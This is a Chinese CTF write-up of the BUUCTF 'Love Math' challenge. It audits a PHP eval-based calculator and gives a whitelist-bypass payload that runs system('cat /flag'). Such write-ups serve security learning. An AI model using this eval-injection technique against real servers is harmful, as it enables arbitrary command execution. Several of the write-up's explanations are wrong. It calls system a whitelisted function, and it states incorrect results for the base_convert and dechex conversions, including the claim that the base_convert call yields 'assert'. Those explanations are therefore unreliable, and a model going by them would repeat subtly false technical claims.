当前位置: 首页 > article >正文

2.buuctf [CISCN 2019 初赛]Love Math

进入题目页面如下

进行代码审计

<?php
//关闭所有错误报告,防止错误信息泄露给用户
error_reporting(0);
//检查是否通过 GET 请求传入了参数 'c'
if(!isset($_GET['c'])){
    // 如果没有传入 'c' 参数,显示当前 PHP 文件的源代码
    show_source(__FILE__);
}else{
    //如果传入了 'c' 参数,将其值赋给变量 $content
    $content = $_GET['c'];
    //检查 $content 的长度是否大于等于 80
    if (strlen($content) >= 80) {
        // 如果长度超过限制,终止脚本并输出错误信息
        die("太长了不会算");
    }
    //定义一个黑名单数组,包含一些不允许输入的字符
    $blacklist = [' ', '\t', '\r', '\n', '\'', '"', '`', '\[', '\]'];
    //遍历黑名单数组
    foreach ($blacklist as $blackitem) {
        //使用正则表达式检查 $content 中是否包含黑名单中的字符
        if (preg_match('/' . $blackitem . '/m', $content)) {
            // 如果包含,终止脚本并输出错误信息
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //定义一个白名单数组,包含一些允许使用的数学函数
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    //使用正则表达式匹配 $content 中的所有函数名,并将结果存储在 $used_funcs 数组中
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    //遍历匹配到的函数名数组
    foreach ($used_funcs[0] as $func) {
        //检查函数名是否不在白名单中
        if (!in_array($func, $whitelist)) {
            // 如果不在白名单中,终止脚本并输出错误信息
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //使用 eval 函数执行 $content 中的代码,并将结果输出
    eval('echo '.$content.';');
}

任意代码执行漏洞

代码使用 eval 函数执行用户通过 GET 请求传入的 c 参数的值。虽然代码对输入的长度、字符和函数进行了限制,但仍然可以利用白名单中的函数构造恶意代码来执行任意命令。

过滤机制

通过 strlen($content) >= 80 限制输入的长度,防止过长的输入

使用黑名单过滤了一些特殊字符,如空格、引号等

使用白名单过滤了允许使用的函数,只允许使用预定义的数学函数


利用白名单中的 system 函数

利用 base_convert 函数进行字符编码转换,构造出执行系统命令的代码

构造如下的 GET 请求

?c=system(base_convert(31415926535897932384626433832795,10,36))

其中 base_convert(31415926535897932384626433832795,10,36) 会将十进制数转换为三十六进制数,这个三十六进制数对应的字符串可以是 cat flag.txt

尝试错误再试试别的函数

构造命令

?c=($_GET[a])($_GET[b])&a=system&b=cat /flag

但是a,b都不是白名单里面的内容,需要替换

?c=($_GET[asin])($_GET[abs])&asin=system&abs=cat /flag

[]居然也被黑名单过滤了qyq


借助 base_convert 函数实现字符编码转换,同时通过变量覆盖的手段调用系统命令

绕过代码里对输入的长度、字符以及函数的限制,进而利用 eval 函数达成任意代码执行,最终获取 flag 文件

base_convert 函数的作用是把一个数字从一种进制转换为另一种进制。这里将十进制数 37907361743 转换为三十六进制。经过转换后得到的结果是 assert (37907361743 转换为三十六进制是 assert)

把 assert 作为函数名,将 5f466214 作为参数传入,也就是执行 assert('5f466214');

payload

/?c=$asin=base_convert(37907361743,10,36)(dechex(1598506324));($$asin){pi}(($$asin){abs})&asin=system&abs=cat /flag


最后得到flag


http://www.kler.cn/a/548657.html

相关文章:

  • c++中std::thread构造函数的注意事项
  • 2.4.2 常量的定义与使用
  • sql注入中information_schema被过滤的问题
  • windows使用中碰到的一些问题
  • 基于 Ollama 工具的 LLM 大语言模型如何部署,以 DeepSeek 14B 本地部署为例
  • MATLAB计算反映热需求和能源消耗的度数日指标(HDD+CDD)(全代码)
  • 循环学习率CLR——Cyclical Learning Rates
  • 解决中文乱码:字符编码全攻略 - ASCII、Unicode、UTF-8、GB2312详解
  • postgresql认证怎么考
  • 安灯电子看板助力汽车零部件工厂实时监控与高效管理
  • 复现R1的经典GitHub项目的深度对比分析和学习建议
  • deepseek多列数据对比,联想到excel的高级筛选功能
  • pip 与 conda 的故事
  • 基于Spring Boot的律师事务所案件管理系统的设计与开发(LW+源码+讲解)
  • 2024 年 9 月青少年软编等考 C 语言三级真题解析
  • 4090单卡挑战DeepSeek r1 671b:尝试量化后的心得的分享
  • 【Spring】Spring MVC入门(二)
  • 一键安装教程
  • Qt的isVisible ()函数介绍和判断窗口是否在当前界面显示
  • 蓝桥杯篇---超声波距离测量频率测量